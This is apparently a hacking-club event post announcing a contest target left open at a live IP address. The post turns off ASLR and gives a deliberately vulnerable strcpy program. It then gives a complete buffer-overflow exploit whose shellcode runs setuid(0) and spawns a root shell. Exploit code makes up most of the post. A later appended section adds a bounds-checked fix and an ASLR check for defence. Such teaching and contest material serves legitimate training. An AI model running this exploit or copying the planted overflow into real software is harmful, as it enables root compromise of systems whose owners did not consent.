No one got root yet! We are leaving the target up, available at http://24.251.219.96:8088
It's still open for encroachment through the weekend!

HackFest results: http://plug.phoenix.az.us/comment/edit/126

Kudos to:
PAVLOS KAIRIS, who took the first SSH flag as nobody
RW, who followed by getting mysql access via SSH
DrRabbit (Tuna) for his Windows Work OffFest!

Here's how to escalate to root via overflowing the buffer:

I turned off kernel protection for Linux kernels (a hole in kernels younger than 2.6-18):

echo 0 > /proc/sys/kernel/randomize_va_space

So you should be able to exploit this code:

#include <stdio.h>
#include <string.h>

// 1024 bytes buffer
// 4 bytes to overwrite ebp
// 4 bytes to overwrite eip
// 1032 bytes :)

void viewer(char *string)
{
    char buffer[1024];
    strcpy(buffer,string);   // no length check: the deliberate overflow
    printf("You have entered: %s\n",buffer);
    return;
}

int main(int argc, char *argv[])
{
    if(argc < 2) {
        printf("%s \n",argv[0]);
        return 0;
    }
    viewer(argv[1]);
    return 0;
}
---cut here--end

This works:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>   // execl

#define NOP 0x90 // defining the NOP
#define VUL_FILE "./vuln"

char shellcode[] =
"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x69\x74\x79\x0a\x68\x65\x63"
"\x75\x72\x68\x44\x4c\x20\x53\x89\xe1\xb2\x0f\xb0\x04\xcd\x80"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e" // our shellcode
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53"
"\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

unsigned long get_sp(void)
{
    __asm__("movl %esp, %eax"); // this function returns the stack pointer address, hopefully where
}                               // our shellcode is stored.

int main(int argc, char *argv[], char **envp)
{
    int buff = 1032;               // size of the vuln buffer.
    unsigned long addr = get_sp(); // addr of shellcode.
    char *ptr;                     // used for adding nops etc.

    if(argc > 1)
        buff = atoi(argv[1]);      // if the user supplies a size, use this instead.

    if((buff % 4) != 0)                 // if the size is not a mem addr (divisible by 4)
        buff = buff + 4 - (buff % 4);   // add 4 to it, take away the remainder (makes it divisible by 4)

    if((ptr = (char *)malloc(buff)) == NULL) // check to see you allocated enough memory.
    {
        printf("Error allocating memory.\n");
        exit(0);
    }

    memset(ptr, NOP, buff); // fill the buffer with NOPS making our chances higher.
    memcpy(ptr + buff - strlen(shellcode) - 8, shellcode, strlen(shellcode)); // store the shellcode in the buffer.
    *(long *)&ptr[buff - 4] = addr; // make eip point to our shellcode.

    execl(VUL_FILE, "exploit example1", ptr, NULL); // execute the vuln program with our NOPS&shellcode in the buffer.
    printf("Addr: 0x%lx\n",addr);   // only reached if execl fails
    return 0;
}
---end--

Easy as pI, right? get it?

www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis | (503)754-4452

Catch the January PLUG HackFest! Kristy Westphal, CSO for the AZ Department of Economic Security will provide a one hour presentation on forensics 1/10/09 Noon at UAT.edu.
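Added example, not part of the original post: the post's viewer() with the unbounded strcpy replaced by a length-checked copy, plus a check of the randomize_va_space setting the post turns off. The names bounded_copy, viewer_safe, aslr_mode and VIEW_BUF are assumptions introduced here.

```c
#include <stdio.h>
#include <string.h>
#define VIEW_BUF 1024  /* same size as the buffer in the post's viewer() */

/* Copy src into dst only if it fits, terminator included.
 * Returns 0 on success, -1 if src is NULL or too long for dst. */
int bounded_copy(char *dst, size_t dstlen, const char *src)
{
    if (dst == NULL || src == NULL || dstlen == 0)
        return -1;
    size_t n = 0;
    while (n < dstlen && src[n] != '\0')  /* never scans past dstlen bytes */
        n++;
    if (n == dstlen) return -1;           /* no room for the terminator */
    memcpy(dst, src, n + 1);
    return 0;
}

/* viewer() with the overflow closed: over-long input is refused. */
int viewer_safe(const char *string)
{
    char buffer[VIEW_BUF];
    if (bounded_copy(buffer, sizeof buffer, string) != 0) {
        fprintf(stderr, "rejected: input exceeds %d bytes\n", VIEW_BUF - 1);
        return -1;
    }
    printf("You have entered: %s\n", buffer);
    return 0;
}

/* Read the setting the post zeroes. Returns 0 (ASLR off), 1 or 2 (on),
 * or -1 if /proc/sys/kernel/randomize_va_space cannot be read. */
int aslr_mode(void)
{
    int mode = -1;
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    if (f == NULL) return -1;
    if (fscanf(f, "%d", &mode) != 1) mode = -1;
    fclose(f);
    return mode;
}

int main(int argc, char *argv[])
{
    if (argc < 2) { printf("usage: %s <string>\n", argv[0]); return 0; }
    if (aslr_mode() == 0)
        fprintf(stderr, "warning: ASLR is off (randomize_va_space = 0)\n");
    return viewer_safe(argv[1]) == 0 ? 0 : 1;
}
```

The 1032-byte argument the post's second program builds is refused by viewer_safe before any copy takes place.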